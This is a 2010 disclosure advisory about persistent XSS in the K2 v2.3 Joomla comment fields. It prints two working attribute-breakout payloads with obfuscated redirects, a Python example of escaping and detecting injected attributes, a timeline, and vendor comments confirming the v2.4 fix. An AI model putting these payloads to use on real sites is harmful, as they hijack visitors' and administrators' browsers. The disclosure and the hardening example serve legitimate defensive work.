Saturday, 11 September 2010 12:08

K2 v2.3, the popular Joomla! CCK extension, suffers from persistent XSS vulnerabilities in its comment facility.

Comment "Name" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

Comment "Website" Field Persistent XSS

" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)

NOTE: the payload also executes in the Joomla! administrator backend!
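To show why the leading quote in those payloads breaks out of the attribute and what closes the hole, here is an added Python illustration; it is not the advisory's or K2's code, and the two render functions and the shortened sample payload are constructed stand-ins for the vulnerable and the fixed template:

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the advisory's payload shape: a quote closes the
# template's own attribute, then injected style/onmouseover attributes follow.
# (fromCharCode argument shortened; it decodes to "http".)
SAMPLE_PAYLOAD = ('" style="position:absolute;top:0px;left:0px;width:99em;height:99em" '
                  'onmouseover="location.href=String.fromCharCode(104,116,116,112)')


def render_comment_unsafe(name: str, website: str) -> str:
    """Vulnerable pattern (hypothetical): values concatenated straight into attributes."""
    return f'<a href="{website}" title="{name}">{name}</a>'


def safe_url(website: str) -> str:
    """Allow only absolute http(s) URLs for the Website field; anything else is dropped."""
    parts = urlsplit(website.strip())
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return website.strip()
    return ""


def render_comment_safe(name: str, website: str) -> str:
    """Hardened pattern: HTML-escape every value (quotes included) after URL validation."""
    esc_name = html.escape(name, quote=True)
    esc_site = html.escape(safe_url(website), quote=True)
    return f'<a href="{esc_site}" title="{esc_name}">{esc_name}</a>'


class _AnchorAttrs(HTMLParser):
    """Collects the attribute names a browser would actually see on the <a> tag."""
    def __init__(self) -> None:
        super().__init__()
        self.attrs: list = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs = sorted(name for name, _ in attrs)


def anchor_attributes(rendered: str) -> list:
    """The template only ever emits href and title; any other name was injected."""
    parser = _AnchorAttrs()
    parser.feed(rendered)
    return parser.attrs


if __name__ == "__main__":
    print(anchor_attributes(render_comment_unsafe("bob", SAMPLE_PAYLOAD)))
    print(anchor_attributes(render_comment_safe("bob", SAMPLE_PAYLOAD)))
```

The same check works as a regression test for a template: render a comment with a quote-bearing value and assert the anchor carries no attribute the template did not write.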

Timeline

  • Vulnerabilities Discovered: 24 August 2010
  • Vendor Notified: 24 August 2010
  • Vendor Response: 25 August 2010
  • Update Available: ... 2010
  • Disclosure: 11 September 2010
Last Updated on Thursday, 30 September 2010 17:34
 
Comments (6)
1 Monday, 20 September 2010 11:32
JoomlaWorks
This has been addressed in the coming v2.4.

Additionally, the above vulnerability is only possible if you allow comment editing permissions to members in your site, usually "trusted" people.

Thanks
2 Monday, 20 September 2010 12:51
Jeff Channell
I disagree. The exploit is entered on the frontend comment form, using only the credentials necessary to post a comment - hardly a "trusted" position. The fact that you have to be admin to trigger the exploit makes it more dangerous than usual - executing arbitrary code as admin means I can load up a hidden iframe, install my own php code, etc.
3 Monday, 20 September 2010 22:23
Jeff Channell
JoomlaWorks,

I just tested the latest SVN and you managed to get the frontend XSS, however the Comments panel in administrator is still vulnerable to the Website field XSS...
4 Wednesday, 22 September 2010 07:37
JoomlaWorks
All fixed now in the official 2.4 release available to download on getk2.org

Thanks Jeff ;)
5 Wednesday, 22 September 2010 16:30
K2Joom
I just tested the new v2.4 release and I could not reproduce this issue.
6 Wednesday, 22 September 2010 17:03
Jeff Channell
Same here, 2.4 seems to have this issue resolved...
